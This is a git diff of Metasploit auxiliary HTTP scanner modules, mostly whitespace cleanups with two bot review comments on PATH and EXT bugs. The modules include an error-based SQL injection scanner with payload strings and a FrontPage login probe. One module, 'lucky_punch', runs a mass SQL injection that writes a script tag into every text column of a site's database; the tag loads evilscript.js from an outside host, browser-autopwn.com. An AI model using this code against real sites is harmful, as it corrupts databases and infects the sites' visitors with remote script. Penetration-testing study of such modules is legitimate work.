@@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary OptString.new('DATA', [ false, "HTTP Body Data", '']), OptString.new('COOKIE',[ false, "HTTP Cookies", '']) ], self.class) - + register_advanced_options( [ OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) ], self.class) - + end def run_host(ip) - + gvars = nil pvars = nil cvars = nil - - - + + + sqlinj = [ [ "'" ,'Single quote'], [ "')",'Single quote and parenthesis'], [ "\"",'Double quote'], - [ "#{rand(10)}'", 'Random value with single quote'] + [ "#{rand(10)}'", 'Random value with single quote'] ] - + errorstr = [ ["Unclosed quotation mark after the character string",'MSSQL','string'], ["Syntax error in string in query expression",'MSSQL','string'], ["Microsoft OLE DB Provider",'MSSQL','unknown'], ["You have an error in your SQL syntax",'MySQL','unknown'], - ["java.sql.SQLException",'unknown','unknown'] + ["java.sql.SQLException",'unknown','unknown'] ] - + # # Dealing with empty query/data and making them hashes. # - + if !datastore['QUERY'] or datastore['QUERY'].empty? datastore['QUERY'] = nil gvars = nil else gvars = queryparse(datastore['QUERY']) #Now its a Hash end - + if !datastore['DATA'] or datastore['DATA'].empty? datastore['DATA'] = nil pvars = nil else pvars = queryparse(datastore['DATA']) end - + if !datastore['COOKIE'] or datastore['COOKIE'].empty? datastore['COOKIE'] = nil cvars = nil 
@@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary # - # Send normal request to check if error is generated + # Send normal request to check if error is generated # (means the error is caused by other means) # # - + begin normalres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + if !datastore['NoDetailMessages'] - print_status("Normal request sent.") + print_status("Normal request sent.") end - + found = false inje = nil dbt = nil injt = nil - + if normalres errorstr.each do |estr,dbtype,injtype| if normalres.body.include? estr found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test") - print_error("[#{wmap_target_host}] Error string: '#{inje}'") + print_error("[#{wmap_target_host}] Error string: '#{inje}'") print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', 
@@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary :type => 'DATABASE_ERROR', :data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}" ) - + return end else print_error("[#{wmap_target_host}] No response") - return + return end - + # # Test URI Query parameters # - + found = false - + if gvars sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - gvars.each do |key,value| + + gvars.each do |key,value| gvars = queryparse(datastore['QUERY']) #Now its a Hash gvars[key] = gvars[key]+istr - + if !datastore['NoDetailMessages'] - print_status("- Testing query with #{idesc}. Parameter #{key}:") + print_status("- Testing query with #{idesc}. Parameter #{key}:") end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - if testres + if testres errorstr.each do |estr,dbtype,injtype| if testres.body.include? estr found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}") print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', 
@@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end + end + end + end gvars = queryparse(datastore['QUERY']) end - + # # Test DATA parameters # - + found = false - + if pvars sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - pvars.each do |key,value| + + pvars.each do |key,value| pvars = queryparse(datastore['DATA']) #Now its a Hash - + if !datastore['NoDetailMessages'] - print_status("- Testing data with #{idesc}. Parameter #{key}:") + print_status("- Testing data with #{idesc}. Parameter #{key}:") end - + pvars[key] = pvars[key]+istr - + pvarstr = "" pvars.each do |tkey,tvalue| if pvarstr @@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary end pvarstr << tkey+'='+tvalue end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => datastore['COOKIE'], 'data' => pvarstr }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if testres 
@@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end + end + end + end end # # Test COOKIE parameters # - + found = false - + if datastore['COOKIE'] sqlinj.each do |istr,idesc| - - if found - break + + if found + break end - - cvars.each do |key,value| + + cvars.each do |key,value| cvars = queryparse(datastore['COOKIE']) #Now its a Hash - + if !datastore['NoDetailMessages'] - print_status("- Testing cookie with #{idesc}. Parameter #{key}:") + print_status("- Testing cookie with #{idesc}. Parameter #{key}:") end - + cvars[key] = cvars[key]+istr - + cvarstr = "" cvars.each do |tkey,tvalue| if cvarstr @@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary end cvarstr << tkey+'='+tvalue end - + begin testres = send_request_cgi({ 'uri' => datastore['PATH'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cvarstr, 'data' => datastore['DATA'] }, 20) - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end if testres 
@@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary found = true inje = estr dbt = dbtype - injt = injtype + injt = injtype end end - + if found print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})") - print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") + print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}") print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'") - + report_note( :host => ip, :proto => 'HTTP', @@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary :type => 'SQL_INJECTION', :data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}" ) - + break end else - print_error("[#{wmap_target_host}] No response") + print_error("[#{wmap_target_host}] No response") return - end - end - end - end + end + end + end + end end end diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 193dd84764..8624a703b3 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP File Same Name Directory Scanner', 'Description' => %q{ - This module identifies the existence of files - in a given directory path named as the same name of the + This module identifies the existence of files + in a given directory path named as the same name of the directory. - Only works if PATH is differenet than '/'. + Only works if PATH is differenet than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The directory path to identify files", '/']), OptString.new('EXT', [ true, "File extension to use", '.aspx']) - - ], self.class) - + + ], self.class) + end def run_host(ip) - extensions = [ - '.null', + extensions = [ + '.null', '.backup', '.bak', '.c', @@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary '.html', '.htm', '.log', - '.old', + '.old', '.orig', '.tar', '.tar.gz', @@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary ] tpath = datastore['PATH'] - + if tpath.eql? "/"||"" print_error("Blank or default PATH set."); return end - + if tpath[-1,1] != '/' tpath += '/' - end + end testf = tpath.split('/').last extensions << datastore['EXT'] - + extensions.each { |ext| begin testfext = testf.chomp + ext @@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{tpath}#{testfext}") - + report_note( :host => ip, :proto => 'HTTP', 
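Review bot: The PATH guard `if tpath.eql? "/"||""` in run_host never rejects an empty PATH, because `"/"||""` is evaluated first and always yields `"/"`, so only the literal `/` is caught; the same construct appears in prev_dir_same_name_file.rb (hunk @@ -63,18 +67,18 @@). With an empty PATH the code falls through, the trailing-slash fixup turns `tpath` into `/`, `tpath.split('/').last` returns nil and the `.chomp` call in the extensions loop raises NoMethodError. Suggested replacement: `if tpath.nil? || tpath.empty? || tpath == "/"`. run_host begins and ends outside this hunk.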
@@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath}#{testfext} Code: #{res.code}" ) - + else - print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}") + print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + } - + end end diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index d9aa5b705b..9cf6dc7579 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Interesting File Scanner', 'Description' => %q{ - This module identifies the existence of interesting files - in a given directory path. + This module identifies the existence of interesting files + in a given directory path. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path to identify files", '/']), OptString.new('EXT', [ false, "Append file extension to use", '']), - OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use", + OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt") ] ) - ], self.class) - + ], self.class) + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]), OptInt.new('TestThreads', [ true, "Number of test threads", 25]) - ], self.class) - + ], self.class) + end def run_host(ip) conn = false - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' end - + nt = datastore['TestThreads'].to_i nt = 1 if nt == 0 - + dm = datastore['NoDetailMessages'] - + queue = [] - + File.open(datastore['DICTIONARY']).each do |testf| queue << testf.strip - end - + end + # # Detect error code - # - ecode = datastore['ErrorCode'].to_i + # + ecode = datastore['ErrorCode'].to_i begin randfile = Rex::Text.rand_text_alpha(5).chomp - + res = send_request_cgi({ 'uri' => 
tpath+randfile+ datastore['EXT'], 'method' => 'GET', @@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i + + tcode = res.code.to_i # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) @@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE - end - + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE + end + while(not queue.empty?) t = [] - 1.upto(nt) do + 1.upto(nt) do t << Thread.new(queue.shift) do |testf| Thread.current.kill if not testf - + testfext = testf.chomp + datastore['EXT'] res = send_request_cgi({ 'uri' => tpath+testfext, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") + print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") #blah end else - if res.code.to_i == 400 and ecode != 400 - print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") + if res.code.to_i == 400 and ecode != 400 + print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") else print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") - + report_note( :host => ip, :proto => 'HTTP', @@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath}#{testfext} Code: #{res.code}" ) - - end + + end end end end diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index ce0ce92b73..7d4eeaba3b 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary end info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/" - + connect sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" + @@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary def check_account(info, fpversion, target_host) - return if not fpversion + return if not fpversion connect - # http://msdn2.microsoft.com/en-us/library/ms454298.aspx + # http://msdn2.microsoft.com/en-us/library/ms454298.aspx method = "method=open+service:#{fpversion}&service_name=/" - req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + - "Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" + + req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + + "Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" + "User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + - "Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n" - + "Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n" + sock.put(req) res = sock.get_once - - - + + + if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/)) retcode = $1 retmsg = $2.strip - + if(retcode == "100") res = sock.get_once if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/)) @@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{info} FrontPage Unknown Response [#{retcode}]") end end - + disconnect end 
diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 66842a2674..9b52856a4b 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection', 'Description' => %q{ - This module implements the mass SQL injection attack in + This module implements the mass SQL injection attack in use lately by concatenation of HTML string that forces a persistant XSS attack to redirect user browser to a attacker controller website. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']), 
@@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']), OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]), OptBool.new('COMMENTED', [ true, "Comment end of query", true]), - OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']), - ], self.class) - + OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']), + ], self.class) + end def wmap_enabled false - end + end def run_host(ip) - + #Weird to indent for practical reasons. infstr = %Q{ DECLARE @T varchar(255),@C varchar(255) @@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255) prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST(" poststr = " AS NVARCHAR(4000));EXEC(@S);" - + gvars = queryparse(datastore['QUERY']) #Now its a Hash - + if gvars.has_key?(datastore['VULN_PAR']) - + prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil - attstr = "" - infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" } + attstr = "" + infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" } gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr - else + else print_status("Error: Vulnerable parameter is not part of the supplied query string.") return end - + begin normalres = send_request_cgi({ 'uri' => datastore['URI'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE + rescue ::Errno::EPIPE end - - print_status("Request sent.") - + + print_status("Request sent.") + end end diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index 8fea25fe30..b16f20cd71 100644 
--- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Previous Directory File Scanner', 'Description' => %q{ This module identifies files in the first parent directory with same name as the given directory path. Example: Test /backup/files/ will look for the - following files /backup/files.ext . + following files /backup/files.ext . }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The test path. The default value will not work.", '/']) - ], self.class) - + ], self.class) + end def run_host(ip) - extensions = [ - '.null', + extensions = [ + '.null', '.backup', '.bak', '.c', @@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary '.htm', '.jar', '.log', - '.old', + '.old', '.orig', '.o', '.tar', @@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary ] tpath = datastore['PATH'] - + if tpath.eql? "/"||"" print_error("Blank or default PATH set."); return end - + if tpath[-1,1] != '/' tpath += '/' - end - + end + extensions << datastore['EXT'] - + extensions.each { |ext| begin testf = tpath.chop+ext 
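Review bot: `extensions << datastore['EXT']` at the end of this hunk appends a nil entry: the register_options block earlier in this file (hunk @@ -17,27 +21,27 @@) declares only PATH, so unless EXT is supplied by a mixin, `datastore['EXT']` is nil and `tpath.chop+ext` raises TypeError on the final iteration. Either register the option as file_same_name_dir.rb does, or guard the append with `extensions << datastore['EXT'] if datastore['EXT']`. run_host begins and ends outside this hunk.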
@@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{testf}") - + report_note( :host => ip, :proto => 'HTTP', @@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{testf} Code: #{res.code}" ) - + else - print_status("NOT Found #{wmap_base_url}#{testf}") + print_status("NOT Found #{wmap_base_url}#{testf}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + } - + end end diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index d66e6907e1..4753415c23 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP File Extension Scanner', 'Description' => %q{ - This module identifies the existence of additional files + This module identifies the existence of additional files by modifying the extension of an existing file. - + }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']), - OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']), + OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']), ], self.class) - + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) - ], self.class) - - + ], self.class) + + end def run_host(ip) - + conn = false - + dm = datastore['NoDetailMessages'] - + extensions= [ 'bak', 'txt', 
@@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary tpathfile = Pathname.new(datastore['PATH']) tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)] - + extensions.each { |testext| - + # # Detect error code. This module is a special case as each extension - # usually is handled diferently by the server with different error codes - # - ecode = datastore['ErrorCode'].to_i + # usually is handled diferently by the server with different error codes + # + ecode = datastore['ErrorCode'].to_i begin randchars = Rex::Text.rand_text_alpha(3).chomp tpath = tpathnoext+randchars+testext - + res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i + + tcode = res.code.to_i emesg = "" - + # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) - + File.open(datastore['HTTP404Sigs']).each do |str| if(res.body.index(str)) emesg = str @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end - + #if not conn return - + begin tpath = tpathnoext+testext res = send_request_cgi({ 
@@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}") + print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}") #blah end else - if res.code.to_i == 400 and ecode != 400 - print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}") + if res.code.to_i == 400 and ecode != 400 + print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}") else print_status("Found #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', @@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath} Code: #{res.code}" ) - + end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE - end + rescue ::Timeout::Error, ::Errno::EPIPE + end } - + end end diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 918faeeacb..eb39cdfcfa 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer 
@@ -26,43 +30,43 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['et'], 'License' => MSF_LICENSE ) - + register_options( [ OptString.new('PATH', [ true, "The test path to find robots.txt file", '/']) - + ], self.class) - + end def run_host(target_host) - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' end begin turl = tpath+'robots.txt' - + res = send_request_cgi({ - 'uri' => turl, + 'uri' => turl, 'method' => 'GET', 'version' => '1.0', }, 10) - - if res and res.body.include?("llow:") + + if res and res.body.include?("llow:") print_status("[#{target_host}] #{tpath}robots.txt found") - - # short url regex + + # short url regex aregex = /llow:[ ]{0,2}(.*?)$/i result = res.body.scan(aregex).flatten.map{|s| s.strip}.uniq - + print_status("[#{target_host}] #{tpath}robots.txt - #{result.join(", ")}") - result.each do |u| - + result.each do |u| + report_note( :host => target_host, :proto => 'HTTP', @@ -70,10 +74,10 @@ class Metasploit3 < Msf::Auxiliary :type => 'ROBOTS_TXT', :data => "#{u}" ) - + end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index fc0371a988..7eb6cf7700 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # 